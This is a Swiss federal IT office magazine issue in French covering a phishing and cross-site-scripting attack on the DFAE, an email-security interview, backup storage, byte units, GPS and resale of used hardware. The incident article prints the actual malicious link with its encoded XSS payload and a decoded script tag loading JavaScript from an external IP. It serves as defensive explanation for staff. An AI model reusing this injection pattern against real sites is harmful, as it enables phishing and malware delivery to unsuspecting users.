Office fédéral de l'informatique et de la télécommunication OFIT

La présente édition est conçue pour les navigateurs sans soutien CSS suffisant et s'adresse en priorité aux malvoyants. Tous les contenus peuvent également être visualisés à l'aide de navigateurs plus anciens. Pour une meilleure visualisation graphique, il est toutefois recommandé d'utiliser un navigateur plus moderne comme Mozilla 1,4 ou Internet Explorer 6.

Début sélection langue

Début navigation principale

Fin navigation principale


Début secteur de contenu

Début navigateur

Fin navigateur




Thèmes principaux No. 30

Des "bugs" sortent d'une envelope.
A l’heure actuelle, les «bugs» n'arrivent plus directement dans le système de l'ordinateur en tant qu'annexe au courriel. Par contre, de plus en plus de courriels avec des liens vers d'autres sites Internet contenant des maliciels susceptibles d’infecter les ordinateurs arrivent dans nos boîtes de réception.

Sécurité informatique

Menaces sur la boîte de réception

En novembre dernier, des pirates ont lancé une attaque de virus ciblée contre le DFAE dans le but de soutirer des informations confidentielles. Grâce à la réaction immédiate de collaborateurs attentifs, l'attaque n'a pas atteint son but. Mais ce n'était certainement pas la dernière tentative de piratage du réseau informatique de la Confédération.

Tout a commencé par une invitation envoyée à plus de 500 collaboratrices et collaborateurs du DFAE. Les e-mails adressés personnellement portaient le logo bien connu de la Confédération suisse et invitaient à participer à l'évaluation de photos: il s'agissait d'évaluer les meilleurs envois d'un concours de photo amateur entre des collaboratrices et collaborateurs de la Confédération sur un site web du Secrétariat d'Etat à l'économie (SECO) et de désigner le vainqueur, donc une invitation peu suspecte à participer à un événement interactif. En cliquant sur le lien indiqué dans l'e-mail, on arrivait au site web du concours du SECO. Ce que les visiteuses et visiteurs ne pouvaient pas savoir c'est que le site du SECO était falsifié! Ceux qui voulaient voir les photos du concours présumé chargeaient sans le savoir un logiciel malveillant sur leur ordinateur. Bien entendu, l'expéditeur du message était lui aussi falsifié: pour endormir la méfiance des destinataires, les pirates avaient donné comme expéditeur une adresse e-mail (existante) de la Fédération suisse du tourisme.

Une technique de piratage raffinée
D'un point de vue technique, l'attaque qui visait le DFAE était un Cross-Site-Scripting, en abrégé XSS. On entend par là l'exploitation de certaines failles dans la sécurité d'un site web pour y insérer subrepticement, par un lien manipulé, un code javascript qui s'exécute ensuite sur l'ordinateur de la victime. L'attaquant a ainsi la possibilité de faire s'afficher des contenus modifiés du site web, alors que l'utilisateur croît se trouver sur le site original. Pour qu'un tel mimétisme de site fonctionne, il faut amener l'utilisateur à visiter l'adresse URL correspondante. On y parvient souvent au moyen d'un e-mail alléchant tel que celui qui a été envoyé aux collaboratrices et collaborateurs du DFAE. De tels e-mails sont en règle générale en format HTML, car cela permet de camoufler facilement la manipulation du lien.

Dans le cas présent, les pirates ont tiré profit d'une validation d'input encore manquante à l'époque sur un site web de l'administration fédérale pour réaliser le Cross-Site-Scripting et présenter aux utilisateurs un site du SECO falsifié. Les contenus falsifiés du SECO étaient présentés dans le contexte de www.admin.ch, et le seul élément qui a effectivement été utilisé - abusivement - par admin.ch était le script PHP «Printme», qui génère une version imprimable du site en question (voir encadré). Admin.ch a été utilisé seulement comme «réflecteur» pour le site falsifié du SECO, ce qui constitue une caractéristique principale du Cross-Site-Scripting. Grâce à cet artifice, même la ligne d'adresse dans le navigateur reste digne de confiance (commençant par «www.admin.ch»).

Des fautes de frappe suspectes
Comme l'analyse de l'incident du DFAE l'a montré, le lien inséré dans l'e-mail mettait en évidence le script «Printme» vulnérable et lançait ensuite un XSS. Un fichier javascript était téléchargé depuis un serveur situé en Tanzanie (Afrique orientale). Ce script représentait ensuite le site web falsifié du SECO dans le contexte d'admin.ch. Le virus en lien sur le site web était sur un serveur situé à Beyrouth (Liban). Le logiciel malveillant arrive camouflé sous la forme d'un économiseur d'écran, que les pirates avaient même muni d'une icône représentant la croix suisse. Une fois activé, l'économiseur d'écran affiche des images du concours de photo présumé. En arrière-plan, le logiciel malveillant crée sur l'ordinateur différentes tâches qui s'activent ensuite à chaque ouverture de session de l'utilisateur. Les fichiers qui placent le virus sur l'ordinateur sont protégés et invisibles pour l'utilisateur et ont la possibilité de communiquer avec différents serveurs externes, de télécharger de nouveaux logiciels malveillants ou de transmettre les informations collectées. L'attaque avait très vraisemblablement pour but de soutirer des informations confidentielles (p. ex. mots de passe).

L'attaque contre le DFAE était conçue de manière suffisamment raffinée pour amener quelque 70 collaboratrices et collaborateurs à participer à la pseudo évaluation des photos ce qui a permis au virus de s'installer sur leurs ordinateurs. Cependant, les formulations farfelues et les nombreuses fautes de frappe dans l'invitation et sur le site web du concours ont paru suspectes à quelques collaborateurs. Il était notamment question de «fonctionnaires civils fédéraux», un terme qui n'est pas utilisé au sein de l'administration fédérale. Les auteurs des textes ne disposaient visiblement pas d'un clavier avec des trémas. Grâce à l'annonce immédiate au HelpDesk du DFAE, les spécialistes informatiques ont pu intervenir rapidement et éviter ainsi des dommages plus conséquents. Les quelque 70 ordinateurs infectés ont pu être identifiés immédiatement. Ils ont été bloqués et réinitialisés et tous les utilisateurs et utilisatrices concernés ont dû changer leurs mots de passe. Mais la prochaine attaque viendra certainement (voir Interview): selon la Centrale d'enregistrement et d'analyse pour la sûreté de l'information MELANI (www.melani.admin.ch) la nature de l'attaque dirigée contre le DFAE laisse penser qu'il s'agit de professionnels dotés de certains moyens financiers et techniques.

L'astuce XSS
Le texte du lien sur lequel on pouvait cliquer dans le message HTML était le suivant: «Transfert sur le site web pour le vote» (sic!). Derrière ce texte se cachait un lien qui se présentait comme suit:

http://www.admin.ch/ch/script/printme.php?uh=1339E2D660B3135B:1775C445C06C1713&de=1DEC54A5&site=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%31%39%36%2E%34%36%2E%31%30%36%2E%37%31%2F%77%65%74%74%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&_lang=de

En clair:

...<script src=http://196.46.106.71/wett.js></script>...

Ce lien signifie: lorsque la page est appelée, va chercher un javascript sur la page 196.46.106.71 avec le nom wett.js


Interview

«Attention aux messages HTML»

Reto Inversini, architecte de système d'information/Security à l'OFIT, nous parle des messages et des sites web dangereux.

Eisbrecher: y a-t-il souvent des attaques contre l'informatique de la Confédération?
Reto Inversini:
les attaques sont de plus en plus ciblées; elles visent non seulement à collecter des informations, mais ont aussi et surtout des buts économiques. Les grandes attaques de virus qui tendent à limiter la disponibilité des systèmes ont presque disparu. Au lieu de cela, les attaques visent à prendre le contrôle d'un ordinateur sans éveiller l'attention.

Quel est le but de ces attaques?
Il y a trois domaines principaux: 
 - Collecte d'informations (des mots de passe aux secrets d'entreprise et aux activités d'espionnage en passant par les Keylogger)
- Usurpation d'identité
- Réseaux bot: les appareils attaqués sont souvent intégrés dans un réseau bot. Ces réseaux géants d'ordinateurs capturés (souvent plusieurs 100 000 d'ordinateurs, plus rarement plusieurs millions) sont utilisés pour l'envoi de spams et de phishing ainsi que pour des attaques DDoS. (On entend par DDoS - Distributed Denial of Service - une attaque contre un ordinateur visant à mettre sa disponibilité hors service. Contrairement à une attaque DoS, l'attaque est lancée à partir de nombreux ordinateurs disséminés. Note de la réd.)

A quoi reconnaît-on un message potentiellement dangereux?
Il convient de faire particulièrement attention aux e-mails au format HTML, l'exemple du DFAE l'illustre très bien. Les e-mails de source inconnue doivent en principe être supprimés directement avec Shift-Delete. Il est aussi possible de falsifier un e-mail avec un expéditeur admin.ch et de l'envoyer sur le réseau de la Confédération. Par principe, il faudrait se demander à chaque e-mail si on l'attendait et si le style du message correspond au style attendu.

Faut-il cliquer sur les liens dans les e-mails?
Non, il ne faut pas le faire sauf si l'on est sûr que l'e-mail provient effectivement de la bonne personne (p. ex. parce qu'il contient une signature SecureMail valable). Les e-mails contenant seulement du texte sont moins dangereux, car on y voit l'ensemble du lien (p. ex. http://intranet.bit.admin.ch). Dans un e-mail en format HTML, le lien est caché sous le texte (p. ex. «Cliquer ici pour arriver sur le site de l'OFIT» est le nom du lien, derrière peut toutefois se cacher une adresse URL x, p. ex. http://badwebsite.com). Il est toujours mieux de taper un lien ou de le tirer des favoris.

Comment doit-on se comporter si l'on a reçu un message suspect?
Si l'e-mail n'a pas de rapport avec l'administration fédérale, il vous suffit de le supprimer avec SHIFT-Delete. Si l'e-mail essaie de reproduire un rapport avec l'administration fédérale (ou avec vous en tant que personne), informez votre chargé de la sécurité de l'information (ISBO), enregistrez l'e-mail et transférez-le comme pièce jointe à servicedesk@bit.admin.ch.

Que faut-il faire si l'on est tombé dans le piège et qu'un logiciel malveillant s'est installé?
Retirez le câble réseau de votre ordinateur et informez le Service Desk de l'OFIT, ou le Helpdesk de votre organisation.

Où se cachent des logiciels malveillants sur internet?
Les logiciels malveillants sont non seulement diffusés par e-mail, mais aussi et de plus en plus souvent directement par le web, p. ex. par des bannières publicitaires malicieuses qui s'affichent sur des sites de confiance. Des liens vers des sites ou des fichiers malicieux sont de plus en plus souvent envoyés aux utilisateurs par la messagerie instantanée. Lorsque des logiciels malveillants sont diffusés par e-mail, il est fréquent que le message ne contienne qu'un lien vers le site contenant le logiciel malveillant. Les fichiers annexés malicieux sont de plus en plus rares, même s'ils n'ont pas encore entièrement disparu.

Les économiseurs d'écran dans le collimateur
Comme mesure de lutte contre l'apparition d'économiseurs d'écran infectés par des virus, l'OFIT a bloqué le téléchargement de documents se terminant par .scr (screensaver) via le navigateur internet. Ces types de fichiers étaient déjà bloqués sur les serveurs de messagerie de la Confédération (Outlook, e-mail) depuis le milieu de 2004. Détails: www.ais.admin.ch

Contact à l'OFIT : Stefan Neuenschwander, tél. : 031 322 06 17
Texte : Leo Hauser
Photo: Stefan Flükiger, Leo Hauser


Stefan Kälin, responsable du domaine Stockage, vue par l'interieur ddurch das Innere einer Tape Library.
Vue d’ensemble: Stefan Kälin, responsable du domaine Stockage. Chaque «cassette» de la tape library du centre de calcul de l’OFIT contient 1,5 Terabyte de données.
 Stockage des données

Stockage des données : l'administration fédérale assure

La sauvegarde des données à l'OFIT devenait difficile en raison de la croissance énorme des données non structurées. Avec l'introduction d'un nouveau logiciel de backup, l'OFIT peut à nouveau stocker les données en toute sécurité.

Article du magazine «Computerworld» N° 13/2008, repris avec l'aimable autorisation de la rédaction de «Computerworld».

Aujourd'hui, l'avalanche de données dans les entreprises et les organisations est surtout générée par des données non structurées: à l'heure actuelle, moins de la moitié des données sont disponibles sous une forme structurée dans des banques de données et des applications commerciales. Le reste est réparti en majeure partie dans des systèmes de courrier électronique et de messagerie et des fichiers Office non structurés. Cette évolution a donné bien du fil à retordre à Stefan Kälin, chef du secteur Storage à l'OFIT. «L'accroissement des données non structurées a été dramatique. Mais face à cette évolution, nous étions beaucoup plus préoccupés par la sauvegarde des données que par l'espace mémoire.»

Ainsi, la plage horaire créée le week-end pour le backup n'était plus suffisante. En outre, les coûts du backup étaient aussi un sujet de préoccupation pour M. Kälin: la mémoire centrale, coûteuse, était occupées par l'archivage redondant de données, en particulier des pièces jointes aux e-mails. L'espace mémoire installé à l'OFIT dépasse les 450 téraoctets et chaque mois vient s'y ajouter en moyenne plus de 1 téraoctet (1 téraoctet = 1 million de mégaoctets).

Pour M. Kälin, il était clair que les logiciels utilisés pour la sauvegarde des données ne pourraient plus répondre longtemps aux exigences et qu'il fallait donc les remplacer d'urgence. Avec son équipe, il a donc lancé un appel d'offres pour le projet selon les normes de l'Organisation mondiale du commerce (OMC). L'évaluation minutieuse des offres a permis de présélectionner trois fournisseurs. Lors de la prise de décision, l'équipe a volontairement pris sont temps: pour chaque outil, une installation test a été mise en place et testée avec soin pendant un an.

«Les produits étaient très proches les uns des autres», se souvient M. Kälin. En fin de compte, c'est Veritas NetBackup de Symantec qui a obtenu le marché. Deux critères ont été décisifs: NetBackup arrivait mieux à gérer des environnements hétérogènes et offrait la compatibilité nécessaire avec les divers dérivés de système d'exploitation. En outre, ce logiciel se démarquait par des fonctions complètes.

Une infrastructure hétérogène
La compatibilité avec des environnements hétérogènes revêtait une importance particulière. Car le concept de l'OFIT prévoit trois sites pour les centres de calcul: le centre de calcul principal dans le bâtiment «Titanic-II» à Berne, un centre de calcul de backup à cinq kilomètres de distance et un site de récupération des données en cas de catastrophe (Disaster-Recovery) protégé par l'armée, à 100 km de distance. Tous les sites sont reliés entre eux par des lignes à très haut débit redondantes.

Le concept actuel tire son origine de la décision de la Confédération prise en 2000 qui prévoyait de consolider les services informatiques, au nombre de 75 à l'époque, en sept unités. «Avec cette décision», se souvient Stefan Kälin, «nous avons dû prendre en charge des architectures de système très diverses, des dérivés de système d'exploitation aux systèmes de sauvegarde». Aujourd'hui, les choses ont bien changé. La standardisation de tous les composants a été et continue d'être systématiquement développée. Les tâches d'intégration occasionnées par l'insourcing des départements englobaient aussi le logiciel de backup.

Un backup élégant
L'infrastructure de sauvegarde de l'OFIT est construite de manière entièrement symétrique. Les sites primaire et secondaire sont reliés par une liaison DWDM (Dense Wavelength Division Multiplexing; permet des réseaux avec une capacité de transmission extrêmement élevée). Pour le backup, ces deux sites sont en outre reliés à un backbone IP Gigabit. Les données modifiées sont simultanément transcrites sur les deux sites sur des bibliothèques de bandes (Tape Libraries) identiques. «NetBackup accomplit cette tâche de manière très élégante», indique Stefan Kälin, satisfait.

Ce concept de sauvegarde inclut également toutes les données des applications pour lesquelles un besoin de protection accru a été défini dans le projet de prévention des catastrophes pour l'administration fédérale. Les e-mails en font partie. Ces données sont copiées plusieurs fois par jour par le réseau Gigabit du site primaire vers le site secondaire avant d'y être sauvegardées sur bande.

NetBackup effectue quotidiennement une sauvegarde incrémentielle des données des données modifiées le jour même. Ces bandes de sauvegarde sont conservées sept jours avant d'être écrasées. Chaque semaine, une sauvegarde complète est effectuée et conservée trois semaines. A cela s'ajoute une sauvegarde complète mensuelle qui ne peut être écrasée qu'après 90 jours. «Il s'agit là des cas standard», explique Stefan Kälin. «Il est évidemment possible de configurer d'autres cycles de sauvegarde avec NetBackup. Cela dépend uniquement des exigences de nos clients».

Des hiérarchies de sauvegarde intelligentes
M. Kälin a également résolu le problème de la sauvegarde redondante des données sur des mémoires primaires coûteuses. Il s'agit d'appliquer une stratégie ILM (Information Lifecycle Management) qui déplace les données en fonction de leur importance sur le support de sauvegarde le mieux adapté. Les données qui datent par exemple de plus de trois mois sont automatiquement transférées sur des supports bon marché. «Nous avons constitué une hiérarchie de sauvegarde à partir de systèmes high-end, mid-range et low-cost», déclare M. Kälin. «Dans le secteur low-cost, nous visons des coûts de 10 centimes par gigaoctet et par mois». Grâce à cette hiérarchie de sauvegarde, le volume du backup est sensiblement réduit.

L'OFIT utilise aujourd'hui pour le stockage des données plusieurs bibliothèques de bandes (Tape Libraries). «Nous avons dépassé depuis longtemps la limite des pétaoctets (1 pétaoctet = 1000 téraoctets, réd.)», indique Stefan Kälin. Des systèmes de stockage optiques sont encore utilisés, mais ils seront bientôt remplacés par des archives sur disques. «Les disques sont en principes bien adaptés pour les archives», déclare le chef de secteur de l'OFIT. «Comme supports de backup, nous les trouvons moins appropriés. Ici, nous conserverons encore longtemps la bande comme support avantageux et flexible, surtout avec les futures cassettes à 2 téraoctets». C'est pourquoi l'équipe de l'OFIT est encore sceptique à l'égard du concept de Virtual Tape Library, donc de systèmes de disques qui peuvent être enregistrés comme des bandes. Avant de les utiliser, il faut d'abord exploiter toutes les fonctions de NetBackup.

Contact à l'OFIT : Stefan Kälin, tél. : 031 325 93 18
Texte : Claudia Bardola («Computerworld»)
Photo : Leo Hauser

-----

Combien d'octets font un mégaoctet?

Tout le monde connaît ça: dans le prospectus, le nouvel ordinateur est équipé d'un disque dur de 500 gigaoctets (Go), mais le système d'exploitation indique seulement 466 Go. Il en va de même du DVD vierge d'une capacité de stockage de 4,7 Go: lorsqu'on le place dans le lecteur, l'ordinateur n'indique plus que 4,38 Go. S'agit-il d'une arnaque?

Voici l'explication: les fabricants de disques et de DVD vierges comptent autrement que l'ordinateur et avec raison. Traditionnellement, l'informatique compte avec des mesures binaires. Un kilooctet (Ko) correspond donc à 1024 (210) octets, un mégaoctet (Mo) à 1 048 576 (220) octets, etc. Or selon le Système international d'unité (SI), les préfixes kilo, méga, giga, etc. sont réservés aux mesures décimales. D'après les règles du SI reconnues au niveau international, un Ko correspond donc exactement à 1000 (103) octets et un Mo à 1 000 000 (106) octets. Les fabricants de disques durs, de DVD et de Blu-ray utilisent les préfixes conformément aux normes du SI. En revanche, l'ordinateur utilise les préfixes kilo, méga, giga, etc. pour la taille des fichiers, la capacité de mémoire de travail et la taille des disques durs de manière traditionnelle (mesures binaires) et donc non conforme aux normes du SI. Un gigaoctet sur le DVD correspond donc exactement à 1 000 000 000 (109) octets, tandis qu'un gigaoctet sur le disque dur correspond à 1 073 741 824 (230) octets.

On pourrait éliminer simplement cette confusion en utilisant les unités correctes. Les préfixes kilo, méga, giga, etc. devraient être utilisés exclusivement de manière conforme au SI, c'est-à-dire uniquement pour les mesures décimales. Pour les mesures binaires, il existe depuis quelques années d'autres préfixes qui ne se sont toutefois pas encore imposés dans la pratique: il s'agit de kibi (Ki), mébi (Mi), gibi (Gi) etc., préfixes tirés des termes kilobinaire, mégabinaire, gigabinaire, etc. Au lieu de kilooctet et de mégaoctet, on parle donc par analogie de kibioctet (Kio) et de mébioctet (Mio).

1 Ko = 103 octets = 1000 octets
1 Kio = 210 octets = 1024 octets
1 Mo = 106 octets = 1 000 000 octets
1 Mio = 220 octets = 1 048 576 octets
1 Go = 109 octets = 1 000 000 000 octets
1 Gio = 230 octets = 1 073 741 824 octets

Bureau international des poids et mesures


Globe avec 4 satellites.
Positionnement 3D avec 4 satellites: En se fondant sur la durée nécessaire au signal satellite pour atteindre l'appareil de réception GPS, ce dernier calcule sa distance par rapport à chaque satellite et ainsi détermine sa position dans l’espace.
 GPS & Co

L'orientation sans faille

Une voix synthétique, agréable, nous indique la direction à suivre: «Au prochain carrefour, tournez à gauche». Mais comment un système de navigation peut-il savoir où il se trouve et quelle direction doit prendre l'automobiliste? C'est possible grâce au GPS et à des systèmes analogues.

Le GPS (Global Positioning System) est le système de localisation le plus connu. Il est constitué d'une trentaine de satellites qui envoient à 20 000 mètres d'altitude un signal qui permet à un récepteur GPS de calculer sa position actuelle sur la terre. Le GPS est à la disposition de tous dans le monde entier, gratuitement et en permanence. Et comme ils sont devenus abordables pour tout un chacun, les appareils GPS sont de plus en plus appréciés. En outre, de tels appareils ne sont plus réservés aux spécialistes et aux passionnés de technologie. De plus en plus d'appareils GPS sont disponibles aussi pour le quotidien. L'offre s'étend aujourd'hui des simples aides à l'orientation aux assistants d'entraînement pour sportifs en passant par des systèmes de navigation pour les automobilistes.

Comment fonctionne le GPS?
Pour permettre la détermination exacte de la position, chaque satellite GPS envoie en permanence un signal qui indique sa position ainsi que le moment de l'envoi du signal. Pour faciliter les calculs suivants, chaque satellite envoie en outre des informations sur son orbite. Le récepteur calcule alors sa position en comparant le moment de l'émission du signal avec celui de la réception du signal. La différence temporelle donne la distance par rapport au satellite. Le principe se fonde donc en simplifiant l'énoncé sur celui que l'on utilise pour évaluer l'éloignement d'un orage: on compare ici le temps qui s'écoule entre l'éclair et le grondement du tonnerre.

Pour pouvoir déterminer de manière univoque et tridimensionnelle la position, le récepteur doit recevoir le signal d'au moins quatre satellites. Il faudrait si possible disposer d'une «visibilité» illimitée par rapport à ces derniers afin d'obtenir une précision à quelques mètres près. Le récepteur calcule à partir des signaux GPS les coordonnées de son emplacement actuel. S'il contient des informations cartographiques, il est en outre possible de visualiser l'emplacement sur une carte nationale ou un plan de ville. Un calcul permanent de la position permet par ailleurs de déterminer la direction et la vitesse de déplacement.

Localisation par le téléphone mobile
La détermination de la position est aussi possible avec un téléphone mobile. Chaque opérateur de téléphonie mobile est en principe en mesure de déterminer grâce aux cellules radio l'emplacement actuel où se trouve un téléphone (enclenché). Cette méthode est toutefois encore très peu précise. En fonction de la densité des tours radio, l'emplacement peut être déterminé à quelques centaines de mètres ou à plusieurs kilomètres près. Depuis que le GPS a également été intégré dans les téléphones mobiles, la localisation de ces derniers est devenue beaucoup plus précise.

Habituellement, il n'est pas possible de localiser un récepteur GPS, car ces appareils ne fonctionnent qu'en mode passif. Pour une surveillance via GPS, il faut en outre un émetteur actif qui transmet les données de la position calculée. Avec l'exemple du téléphone mobile, ces informations peuvent être envoyées à un tiers par SMS. Certains opérateurs de téléphonie mobile offrent d'ores et déjà des services de localisation à leurs clients. Il est ainsi possible de retrouver des téléphones perdus ou des enfants égarés. Les utilisateurs doivent toutefois accepter l'émission de la position du téléphone mobile. Sinon, un opérateur de téléphonie mobile ne peut aucunement transmettre à un tiers des donnés de ce type.

Le WLAN comme concurrence au GPS?
Aux Etats-Unis, un autre système de détermination de la position a récemment été introduit; il s'oriente à l'aide des réseaux locaux sans fil (WLAN). Ce système fonctionne ainsi: chaque hotspot WLAN envoie en continu un signal dont la force peut être mesurée. Plus le hotspot se trouve loin, plus le signal est faible. De cette manière, il est possible de calculer la distance entre l'appareil de mesure et l'émetteur WLAN. Si plusieurs émetteurs de ce type se trouvent à proximité et que leur position est connue, il est possible de calculer sa propre position à partir de là.

Comme les réseaux locaux sans fil sont aujourd'hui largement répandus dans les ménages privés également, la détermination de la position au moyen de ce nouveau système WPS (WLAN Positioning System) est possible sur l'ensemble du territoire au moins dans les agglomérations. Le problème est que les emplacements de tous les hotspots WLAN existants ne sont pas connus. C'est pourquoi il est nécessaire d'établir une cartographie coûteuse des hotspots existants avant d'introduire ce système, et de l'actualiser à intervalles réguliers. La précision varie ici aussi de 20 mètres en fonction de la densité des émetteurs WLAN. Contrairement au GPS, la détermination de la position avec le WPS est aussi possible à l'intérieur. Nous ne savons pas encore quand le WPS pourra aussi être utilisé en Europe. La cartographie des métropoles européennes est toutefois déjà en cours.

GPS: contexte historique
Le GPS a été réalisé par le ministère américain de la défense et servait à l'origine uniquement à des fins militaires. Il a été mis intégralement en service en 1995. Pour la population civile, les fonctionnalités complètes du GPS n'ont été mises à disposition qu'en 2000 avec l'élimination de la disponibilité sélective (Selective Availability). La précision du positionnement, qui était de 100 mètres avec la disponibilité sélective, est aujourd'hui de quelques mètres.

Pour fournir un signal horaire précis, les satellites GPS sont équipés d'horloges atomiques. Outre l'usage militaire, le GPS est actuellement principalement utilisé dans la navigation aérienne, terrestre et maritime, mais aussi pour les levés de terrain et dans applications qui nécessitent un positionnement précis.

Comme alternative au GPS, plusieurs pays sont en train de développer en parallèle leurs propres systèmes de navigation par satellite. La plupart de ces systèmes (p. ex. Galileo, MTSAT) se trouvent toutefois encore en phase d'expérimentation.

Texte : Marc Bärtschi


Recyclage du matériel informatique

Le matériel usagé se vend bien

Le matériel informatique qui n'est plus utilisé à l'OFIT est mis en vente sur la boutique en ligne « Auctionline ». Tous les clients et collaborateurs de l'OFIT peuvent en profiter. L'offre a même été élargie.

Les offres de matériel informatique usagé de l'OFIT sur la boutique en ligne www.auctionline.ch ont connu un grand succès: les PC, notebooks, écrans, etc. proposés au début de l'année dans des actions ponctuelles se sont vendus comme des petits pains. « Bon nombre d'utilisateurs ne sont plus prêts à suivre l'évolution technologique extrêmement rapide - et chère. Les appareils de la dernière génération suffisent amplement pour beaucoup d'applications », explique Michel Sautter, directeur de la société Swiss Remarketing. Depuis le début de l'année, l'OFIT collabore avec l'entreprise spécialisée dans la diffusion de matériel informatique usagé à Dottikon (AG).

Fort de son succès, l'OFIT a élargi le recyclage de matériel informatique, qui est aussi intéressant du point de vue écologique. Désormais, tous les appareils dont l'OFIT ou ses clients n'ont plus l'usage seront acheminés en permanence au reconditionnement et à la vente par Swiss Remarketing. Le centre de distribution de l'OFIT réceptionne également du matériel informatique usagé en grande quantité pour l'acheminer de cette manière vers la filière de réutilisation. Il n'y aura donc plus de promotions ponctuelles, mais la boutique en ligne proposera toujours une offre suffisante de matériel informatique de seconde main, que le personnel fédéral peut acquérir à des conditions préférentielles et avec une garantie de fonctionnement de 30 jours.  

Reconditionnement et nettoyage
Avant la mise en vente sur la boutique en ligne, les spécialistes de Swiss Remarketing reconditionnent les appareils avec professionnalisme. Le centre de remise en état sécurisé efface les données disponibles sur les supports sur la base de normes de sécurité très strictes. « Il est donc impossible, ultérieurement, de savoir où et par qui l'équipement informatique était utilisé à l'origine », dit Michel Sautter. C'est aussi pourquoi il n'y a pas de prérogative à acquérir un appareil précis, par exemple son ancien ordinateur de bureau. Le système d'exploitation des PC reconditionnés est réinstallé, les claviers et les souris sont minutieusement nettoyés dans des ateliers pour handicapés ou des établissements pénitenciers. Le matériel défectueux ou techniquement dépassé est acheminé vers une filière d'élimination professionnelle.

La boutique en ligne de Swiss Remarketing comprend deux zones: l'une pour les entreprises, protégée par mot de passe (« zone PRO »), et l'autre accessible au grand public. Les appareils de l'OFIT sont d'abord proposés dans la boutique réservée aux entreprises puis, après un certain temps, transférés dans le domaine public. La boutique réservée aux entreprises n'est accessible qu'aux clients et aux collaborateurs de l'OFIT. Pour pouvoir acquérir à coup sûr du matériel d'occasion à bon prix, il est donc recommandé de se procurer le mot de passe actuel sur le site Intranet de l'OFIT et de s'inscrire sur www.auctionline.ch dans « zone PRO ».

Vous trouverez le mot de passe sur la page Intranet de l'OFIT, dans la rubrique « Actualité ».

http://intranet.bit.admin.ch/aktuell/

retour à la vue d'ensemble Le magazine «Eisbrecher»

Fin secteur de contenu



Office fédéral de l'informatique et de la télécommunication OFIT
Contact | Informations juridiques
http://www.bit.admin.ch/dokumentation/00090/00156/02386/index.html?lang=fr